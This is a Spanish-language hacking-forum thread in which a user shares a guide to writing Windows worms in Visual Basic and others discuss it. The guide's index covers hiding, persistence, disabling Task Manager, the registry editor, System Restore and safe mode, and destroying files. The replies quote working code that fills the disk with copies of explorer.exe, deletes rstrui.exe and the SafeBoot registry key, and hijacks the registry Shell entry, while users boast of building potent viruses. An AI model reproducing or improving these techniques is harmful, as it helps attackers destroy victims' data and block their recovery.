Guia de creacion de worms

[>> s E t H <<]

primera vez que hago algo xD

edito y dejo el indice (gracias binary)

Indice
Antes de empezar algunas cosas importantes
1- Introducción
   1.1- Caraterísticas de los virus informáticos y sus similitudes con los virus biológicos
   1.2- Historia de un virus
2- Un poco de orden
   2.1- Módulos: ¡no están solo para declarar variables globales!
   2.2- Orden temporal
3- Ejecutando comandos del CMD y BATCH
   3.1- Ejecutando comandos del MS-DOS
   3.2- Creando y ejecutando BATs
4- El registro de Windows
   4.1- ¿Que es el registro?
   4.2- El editor del registro
   4.3- Operando con el registro desde VB
5- Cosas basicas
   5.1- Ocultación
   5.2- Encontrando el directorio de Windows
   5.3- Pasando desapercibidos
   5.4- Instalando el virus
6- Firmas en el PC
   6.1- El propietario del SO
   6.2- Creando archivos de texto
   6.3- Internet Explorer
7- Dificultando la desinfección
   7.1- Administrador de tareas
   7.2- Editor de registro
   7.3- Restaurar sistema, modo a prueba de fallos y creador de backup's
8- La parte destructiva
   8.1- Cuando va a causar daños
   8.2- Borrando archivos al azar
   8.3- El registro
   8.4- Archivos importantes
   8.5- Llenando el disco duro
Extras
   Extra 1: Creando backup del registro
   Extra 2: Recuperando el registro con un backup
Despedida
   Posibles temas a tratar en la parte 2
   Creditos


ojala les sirva, sobre todo a los newbies... dejen sus opinionis


descarga:

Para ver este enlace Registrate o Inicia Sesion
PD: se abre con el abiword

[Krosty_ufc]

Tengo que felicitarte porque esta muy buena la guia 

Te hago una preg.

En esta parte del code:

Código:

On Error Resume Next
MkDir RutaWindows & "\system32\sytemconfig" 'el directorio "principal"
Dim cant
For cant = 1 To 1E+29  'la cantidad de directorios
Dim Direct As String
Direct = RutaWindows & "\system32\sytemconfig\sytemconfig" & cant
MkDir Direct  'creamos un subdirectorio
Dim count
For count = 1 To 1000  'la cantidad de archivos x directorio
FileCopy RutaWindows & "\explorer.exe", Direct & "\" & count 'copiamos los archivos
DoEvents  'dejamos descansar la computadora
Next
Next

      

Esto que seria

1 To 1E+29

osea porq pones 1e+29 :S me perdi.

Y el "do events" que hace exactamente ?

Eso es todo

Espero la 2da parte.

Gracias por la guia.

Salu2      

[>> s E t H <<]

gracias
el doevents deja "un respiro al pc" osea, es para que no consuma tantos recursos
el "1E+29" te lo cambia automaticament e cuando pones un numero muy grando (por ejemplo 99999999999999 99999999), tene una explicacion mas larga pero no me acuerdo xD
la segunda parte es mucho mas dificil de escribir porque explique casi todo lo basico en la 1 xD

[Zion_Tm]

No lo pude ver con ese programa pues hace 20 dias estoy con Linux, podes copiarlo en un .doc  o  txt y subirlo a rapidshare ? gracias

[Krosty_ufc]

Para ver este enlace Registrate o Inicia Sesion

http://usuarios.lycos.es/videofiesta//tutos/Cursos%20de%20Aprendizaje/Programacion/

Bajate el doc

[Zion_Tm]

Gracias Krosty_ufc  , muy bue manual >> s E t H << ,  te felicito , tengo un par de opiniones sobre el mismo.

esta linea     Kill RutaWindows & "\System32\restore\rstrui.exe 
ya la habia probado hace tiempo, pero el sistema lo recupera automaticament e. Lo que hay que hacer previamente es deshabilitar la proteccion de los archivos del sistema, creo que se llama WFP ( Windows File Protection ) asi luego si podemos eliminar el rstrui.exe y no lo va a poder recuperar.

Ahora si me parece muy util es esta linea   El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot
todos sabemos que el ataque de virus se resuelve desde el modo a prueba de fallos, si funciona esto seria Genialofilo 

El resto esta muyyy interesante, yo le agregaria tambien un bat para cerrarle la sesion y meterle ontraseña de usuario y de administrador, por las dudas si quiere meter el disco como esclavo y salvar su informacion jejejejjee

Sin mas ..  . .Felicidades 

[-SharK_90-]

Alguien ya lo ha probado.. y puede confirmar si esto funciona??

Ahora si me parece muy util es esta linea   El_Objeto.regd elete "HKEY_LOCAL_MAC HINE\System\CurrentControlSet\Control\SafeBoot

La verdad, es muy interesante.! Yo ahora estoy haciendo un Virus (Va a ser, super potente).. y estuve buscando, como deshabilitar el Modo a prubas de fallo y esto es lo único q encontré.
Si que me gustaría saber si alguien ya lo probó.!

PD: Muy buen manual, bastante completo y bien desarrollado. gracias
SALu2--

[Krosty_ufc]

Yo ahora estoy haciendo un Virus (Va a ser, super potente)

Yo habia echo uno, que entre lo mas deestacado:
Se propagaba por msn, bloqueaba el regedit, el msconfig el task manager.
Si de alguna manera lograba habilitar el regedit, a la hora de abrirlo, este se cerraba y se volvia a bloquear, y otras cosas XD
Estaba interesante lo de que cerraba el regedit y lo bloqueaba, si podia llegar a desbloquearlo.
Salu2

[>> s E t H <<]

lo del modo a prueba de fallos lo saque de este mismo foro, pero lo del reemplazar el cmd con el notepad lo encontre yo

lo del wfp lo voy a aeriguar y lo de los batch viene en la segunda parte

PD: si alguien tiene ganas de ayudar con lo de la propagacion bienvenido

[>> s E t H <<]

Ya encontre la solucion al wfp
gracias a microsoft, en su pagina hay una buena explicacion de como trabaja y donde esta el backup


Para ver este enlace Registrate o Inicia Sesion

en la segunda parte va a aparecer

[xhc]

enhorabuena por el manual >> s E t H << , esta muy bien explicado 
ya estoy esperando la segunda parte xD

saludos

[>> s E t H <<]

enhorabuena por el manual >> s E t H << , esta muy bien explicado 
ya estoy esperando la segunda parte xD

saludos

si hay suerte lo trae paap noel, si no para el dia del niño xD

[xhc]

hola, tengo una duda en la parte de añadirse al registro en Shell:

para que se ejecute explorer.exe y tambien el virus, tendria que modificarla asi: Environ("SYSTEMROOT") & "/SYSTEM32/kernel32.exe" & Explorer.exe??

saludos

[>> s E t H <<]

hola, tengo una duda en la parte de añadirse al registro en Shell:

para que se ejecute explorer.exe y tambien el virus, tendria que modificarla asi: Environ("SYSTEMROOT") & "/SYSTEM32/kernel32.exe" & Explorer.exe??

saludos

con probar no se pierde nada.. pero la idea que di no es esa:
es poner ahi el virus y que este llame al explorer.exe con
shell rutawindows & "\explorer.exe"

[xhc]

si no probe porque si al iniciar no se arrancaba el explorer...el disco duro es nuevo y no quiero joderlo como lo hice antes
vamos que tendria que añadirlo y despues poner shell rutawindows & "\explorer.exe" (yo prefiero environ("SYSTEMROOT") no?